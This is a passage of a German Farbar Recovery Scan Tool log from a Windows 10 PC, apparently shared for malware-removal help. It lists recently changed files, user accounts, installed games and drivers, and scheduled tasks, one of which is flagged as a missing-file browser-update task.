2016-04-04 03:32 - 2016-04-04 03:32 - 00070144 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiglpxx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00070144 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiglpxx.dll
2016-04-04 03:29 - 2016-04-04 03:29 - 00043520 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\ati2erec.dll
2016-04-04 03:28 - 2016-04-04 03:28 - 00195072 _____ C:\WINDOWS\system32\hsa-thunk64.dll
2016-04-04 03:28 - 2016-04-04 03:28 - 00174592 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll
2016-04-03 23:27 - 2016-04-03 23:27 - 02412544 _____ C:\WINDOWS\system32\amdacpusl.pdb
2016-04-03 23:16 - 2016-04-03 23:16 - 00364544 _____ (Advanced Micro Devices) C:\WINDOWS\system32\amdacpusl.dll
2016-04-03 23:16 - 2016-04-03 23:16 - 00306176 _____ C:\WINDOWS\system32\amdacpusl.pdb.pub
2016-04-03 23:16 - 2016-04-03 23:16 - 00248832 _____ (Advanced Micro Devices) C:\WINDOWS\SysWOW64\amdacpusl.dll
2016-03-30 20:14 - 2016-03-30 20:14 - 00000000 _____ C:\Users\Harun\AppData\Roaming\dc.ogt
2016-03-24 21:44 - 2016-03-24 21:44 - 00000000 ____D C:\Users\Harun\AppData\Local\TeamViewer
2016-03-23 19:02 - 2016-03-23 19:02 - 00000000 ____D C:\Users\Harun\AppData\Roaming\MCorp

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-04-20 23:12 - 2015-07-29 12:41 - 00001136 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-04-20 21:42 - 2015-07-29 14:04 - 00004156 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{72B71363-67D7-4D80-A0FC-60FE645FEBE1}
2016-04-20 17:29 - 2015-07-29 15:43 - 00000000 ____D C:\Users\Harun\AppData\Local\Battle.net
2016-04-20 17:28 - 2015-07-29 13:31 - 01790124 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-04-20 17:28 - 2015-07-10 18:34 - 00771100 _____ C:\WINDOWS\system32\perfh007.dat
2016-04-20 17:28 - 2015-07-10 18:34 - 00153964 _____ C:\WINDOWS\system32\perfc007.dat
2016-04-20 17:28 - 2015-07-10 13:02 - 00000000 ____D C:\WINDOWS\INF
2016-04-20 17:22 - 2015-08-01 18:48 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2016-04-20 17:22 - 2015-07-29 12:41 - 00001132 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-04-20 17:22 - 2015-07-10 14:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-04-20 17:22 - 2015-07-10 11:05 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-04-20 17:21 - 2015-07-29 17:16 - 00000000 ____D C:\Users\Harun\AppData\LocalLow\Temp
2016-04-20 10:52 - 2015-07-10 13:04 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-04-20 10:45 - 2015-09-24 15:09 - 00000000 ____D C:\Users\Harun\AppData\Roaming\.minecraft
2016-04-19 16:11 - 2016-03-08 16:24 - 00000008 __RSH C:\ProgramData\ntuser.pol
2016-04-19 15:44 - 2015-07-29 16:37 - 00000000 ____D C:\Program Files (x86)\Avira
2016-04-19 14:41 - 2015-07-29 16:36 - 00000000 ____D C:\ProgramData\Package Cache
2016-04-19 12:45 - 2015-07-31 18:06 - 00002306 _____ C:\WINDOWS\System32\Tasks\{812DDBC9-50E6-4521-ABD6-CA97EAF205AD}
2016-04-19 12:45 - 2015-07-31 18:05 - 00002306 _____ C:\WINDOWS\System32\Tasks\{851C45EB-4FE8-42FB-AFE6-FF991A964C5B}
2016-04-19 12:45 - 2015-07-29 12:41 - 00003648 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-04-19 12:45 - 2015-07-29 12:41 - 00003424 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-04-19 12:39 - 2015-09-16 17:58 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-04-19 12:38 - 2015-09-16 17:58 - 00002535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2016-04-19 12:37 - 2015-07-10 13:04 - 00000000 ___HD C:\Program Files\WindowsApps
2016-04-19 12:34 - 2016-02-02 15:15 - 00000000 ___RD C:\Users\Harun\OneDrive
2016-04-19 12:34 - 2015-07-29 13:30 - 00002429 _____ C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-04-17 16:13 - 2015-07-10 13:04 - 00000000 ____D C:\WINDOWS\rescache
2016-04-16 18:30 - 2015-07-29 13:28 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-04-16 18:15 - 2015-09-23 16:25 - 00000000 ____D C:\Users\faruk
2016-04-16 18:15 - 2015-07-29 14:58 - 00000000 ____D C:\Users\aysec
2016-04-16 18:15 - 2015-07-29 13:24 - 00000000 ____D C:\Users\Harun
2016-04-16 18:13 - 2015-07-10 11:05 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-04-16 17:24 - 2016-02-03 10:50 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Audacity
2016-04-16 15:48 - 2015-07-10 12:55 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-04-16 12:41 - 2015-07-29 16:33 - 00000000 ____D C:\Users\Harun\AppData\Local\Spotify
2016-04-16 12:41 - 2015-07-29 16:32 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Spotify
2016-04-15 18:02 - 2015-08-14 19:28 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-04-15 18:00 - 2015-08-14 19:28 - 135176864 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-04-15 17:58 - 2016-02-13 20:36 - 00000000 ___HD C:\$WINDOWS.~BT
2016-04-15 16:59 - 2015-07-29 13:28 - 00000000 ____D C:\Users\Harun\AppData\Local\Packages
2016-04-14 01:45 - 2010-11-21 05:27 - 00453280 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2016-04-11 23:31 - 2016-03-08 16:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2016-04-11 23:28 - 2015-08-01 22:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-04-11 20:21 - 2016-02-27 14:24 - 00000000 ____D C:\Program Files (x86)\Minecraft
2016-04-11 20:21 - 2016-02-02 19:29 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Sony
2016-04-11 20:21 - 2015-07-30 19:07 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Skype
2016-04-11 20:21 - 2015-07-10 11:05 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-04-11 13:22 - 2015-10-22 16:22 - 00000000 ____D C:\Users\Harun\AppData\Local\AMD
2016-04-10 22:05 - 2015-08-01 19:13 - 00000000 ____D C:\Program Files (x86)\AMD
2016-04-10 22:05 - 2015-08-01 18:48 - 00000000 ____D C:\Program Files\AMD
2016-04-10 21:58 - 2015-07-10 14:20 - 00234560 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-04-10 21:56 - 2015-07-10 13:04 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2016-04-10 17:32 - 2015-07-30 15:07 - 00000000 ____D C:\ProgramData\TuneUp Software
2016-04-09 20:13 - 2015-09-29 16:26 - 00000000 ____D C:\Users\Harun\Desktop\Minecraft
2016-04-07 22:37 - 2015-07-29 15:43 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Battle.net
2016-04-07 22:37 - 2015-07-29 15:42 - 00000000 ____D C:\ProgramData\Battle.net
2016-04-06 20:32 - 2015-07-10 13:06 - 00829944 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-04-06 20:32 - 2015-07-10 13:06 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-04-05 09:45 - 2015-08-09 07:13 - 07466024 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9108.tmp
2016-04-05 09:45 - 2015-08-01 18:47 - 00162784 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET9CFC.tmp
2016-04-05 09:45 - 2015-08-01 18:47 - 00143600 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SETA81C.tmp
2016-04-05 09:44 - 2015-08-09 07:13 - 09618784 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET84BF.tmp
2016-04-05 09:44 - 2015-08-09 07:13 - 00130616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET9CDB.tmp
2016-04-05 09:44 - 2015-08-09 07:13 - 00112392 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SETA80A.tmp
2016-04-05 09:43 - 2015-08-09 07:13 - 00112392 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9C84.tmp
2016-04-05 09:43 - 2015-08-01 18:47 - 09675944 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9635.tmp
2016-04-05 09:43 - 2015-08-01 18:47 - 01265208 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9F16.tmp
2016-04-05 09:39 - 2015-08-01 18:47 - 00685584 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\SET9CC9.tmp
2016-04-05 09:38 - 2015-08-09 07:10 - 00451088 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\SET85B6.tmp
2016-04-05 09:38 - 2015-08-09 07:10 - 00151056 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SETA82E.tmp
2016-04-05 09:37 - 2015-08-09 07:10 - 01285136 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\SET8512.tmp
2016-04-05 09:37 - 2015-08-09 07:10 - 00953360 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\SET91F9.tmp
2016-04-05 09:35 - 2015-08-09 07:10 - 40135696 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\SETA7D7.tmp
2016-04-05 09:35 - 2015-08-09 07:10 - 21739024 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\SET9BA2.tmp
2016-04-05 09:27 - 2015-08-09 07:13 - 08929400 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET8401.tmp
2016-04-05 09:27 - 2015-08-09 07:13 - 08669624 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET91B6.tmp
2016-04-05 09:27 - 2015-08-01 18:47 - 11735800 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET906A.tmp
2016-04-05 09:27 - 2015-08-01 18:47 - 01539560 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET9D3E.tmp
2016-04-04 06:16 - 2015-08-09 07:13 - 00102616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll
2016-04-04 06:16 - 2015-08-01 18:47 - 00152568 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiuxp64.dll
2016-04-04 06:16 - 2015-08-01 18:47 - 00133528 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiuxpag.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 09526616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiumd6a.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 08843208 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiumd64.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 08585696 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiumdva.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 07392480 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiumdag.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 00120656 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiu9p64.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 00102616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiu9pag.dll
2016-04-04 06:15 - 2015-08-01 18:47 - 11625784 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atidxx64.dll
2016-04-04 06:15 - 2015-08-01 18:47 - 09583808 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atidxx32.dll
2016-04-04 06:15 - 2015-08-01 18:47 - 01517360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2016-04-04 06:15 - 2015-08-01 18:47 - 01245416 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2016-04-04 06:09 - 2015-08-01 18:47 - 26345472 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\atikmdag.sys
2016-04-04 05:23 - 2015-08-09 07:10 - 40126976 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\amdocl.dll
2016-04-04 05:15 - 2015-08-09 07:10 - 21730304 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\amdocl12cl.dll
2016-04-04 03:57 - 2015-08-09 07:10 - 00442368 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2016-04-04 03:33 - 2015-08-09 07:10 - 01276416 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2016-04-04 03:32 - 2015-08-09 07:10 - 00944640 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2016-04-04 03:32 - 2015-08-09 07:10 - 00142336 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2016-04-04 03:31 - 2015-08-01 18:47 - 00676864 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\atikmpag.sys
2016-04-02 17:01 - 2015-11-21 15:21 - 00000000 ___RD C:\Users\Harun\Desktop\NVU (YAVUZ)
2016-03-30 11:10 - 2015-11-07 20:53 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-03-24 16:01 - 2015-07-30 19:07 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-03-24 16:01 - 2015-07-30 19:07 - 00000000 ____D C:\ProgramData\Skype

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-03-30 20:14 - 2016-03-30 20:14 - 0000000 _____ () C:\Users\Harun\AppData\Roaming\dc.ogt
2016-01-12 18:41 - 2016-01-19 16:52 - 0000600 _____ () C:\Users\Harun\AppData\Roaming\winscp.rnd
2016-01-13 15:38 - 2016-01-19 16:53 - 0000600 _____ () C:\Users\Harun\AppData\Local\PUTTY.RND
2015-07-30 15:17 - 2015-07-30 15:17 - 0007605 _____ () C:\Users\Harun\AppData\Local\Resmon.ResmonCfg
2015-07-29 13:50 - 2015-07-29 13:50 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2016-04-19 15:23

==================== Ende von FRST.txt ============================
Addition

Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:18-04-2016
durchgeführt von Harun (2016-04-20 23:39:30)
Gestartet von C:\Users\Harun\Downloads
Windows 10 Pro (X64) (2015-07-29 11:28:54)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-2630849102-760198568-3561441068-500 - Administrator - Disabled)
aysec (S-1-5-21-2630849102-760198568-3561441068-1004 - Limited - Enabled) => C:\Users\aysec
DefaultAccount (S-1-5-21-2630849102-760198568-3561441068-503 - Limited - Disabled)
faruk (S-1-5-21-2630849102-760198568-3561441068-1009 - Limited - Disabled) => C:\Users\faruk
Gast (S-1-5-21-2630849102-760198568-3561441068-501 - Limited - Disabled)
Harun (S-1-5-21-2630849102-760198568-3561441068-1000 - Administrator - Enabled) => C:\Users\Harun
HomeGroupUser$ (S-1-5-21-2630849102-760198568-3561441068-1002 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

ACP Application (Version: 2016.0403.2316.14 - Advanced Micro Devices, Inc.) Hidden
AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.4 - Advanced Micro Devices, Inc.)
Apple Application Support (32-Bit) (HKLM-x32\...\{FE5C2FAA-118D-4509-B51D-3F71CC9E1B3E}) (Version: 4.3 - Apple Inc.)
Apple Application Support (64-Bit) (HKLM\...\{2937FD88-C9D6-4B82-B539-37CD0A572F42}) (Version: 4.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
AVG PC TuneUp (HKLM-x32\...\AVG PC TuneUp) (Version: 16.32.2.3320 - AVG Technologies)
AVG PC TuneUp (x32 Version: 16.32.5 - AVG Technologies) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Battlefield 4™ (HKLM-x32\...\{ABADE36E-EC37-413B-8179-B432AD3FACE7}) (Version: 1.4.2.30944 - Electronic Arts)
Battlefield™ Hardline (HKLM-x32\...\{CB4AC3DA-8CC1-4516-86DA-4078B57DB229}) (Version: 1.1.0.5 - Electronic Arts)
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.7.1 - EA Digital Illusions CE AB)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Catalyst Control Center Next Localization BR (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.16 - Piriform)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version:  - Valve)
FMW 1 (Version: 1.73.2 - AVG Technologies) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.112 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
HP Support Solutions Framework (HKLM-x32\...\{B1AD4FFB-DD17-43EC-8C30-B9E71EAD9132}) (Version: 12.2.8.17 - Hewlett-Packard Company)
iTunes (HKLM\...\{A31C5565-90D9-4615-AE13-94D86C3836C7}) (Version: 12.3.3.17 - Apple Inc.)
Java 8 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218051F0}) (Version: 8.0.510 - Oracle Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Mozilla Firefox 41.0.2 (x86 de) (HKLM-x32\...\Mozilla Firefox 41.0.2 (x86 de)) (Version: 41.0.2 - Mozilla)
OpenOffice 4.1.1 (HKLM-x32\...\{ACD0FFF9-6B35-43C1-82DB-9FF6990E8602}) (Version: 4.11.9775 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 9.5.12.2862 - Electronic Arts, Inc.)
PlaysTV (HKLM-x32\...\PlaysTV) (Version: 1.9.2-r111395-release - Plays.tv, LLC)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.994 - Even Balance, Inc.)
Raptr (HKLM-x32\...\Raptr) (Version: 5.1.2-r111396-release - Raptr, Inc)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.41.216.2011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.21 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.21.100 - Skype Technologies S.A.)
Spotify (HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Spotify) (Version: 1.0.25.127.g58007b4c - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Unity Web Player (HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\UnityWebPlayer) (Version: 5.2.0f3 - Unity Technologies ApS)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
WinRAR 5.30 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
World of Warcraft Public Test (HKLM-x32\...\World of Warcraft Public Test) (Version:  - Blizzard Entertainment)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-2630849102-760198568-3561441068-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Harun\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\FileCoAuth.exe (Microsoft Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {114F0918-4CBC-4DF3-89CF-6EF208E7497C} - \ffgogogoBrowserUpdateUA -> Keine Datei <==== ACHTUNG
Task: {11AE36CB-2A03-4DDC-A890-64628F30C9EF} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {17A4B275-EE49-4865-B9C9-53C2BB6B071F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-03-07] (Hewlett-Packard)
Task: {2798CFEA-C567-4F10-8381-056656C30F47} - System32\Tasks\{851C45EB-4FE8-42FB-AFE6-FF991A964C5B} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&amp;ver=7.7.0.103&amp;LastError=-3
Task: {2CF52B04-7B08-4ACC-A970-6B3FD69FDC4A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-29] (Google Inc.)
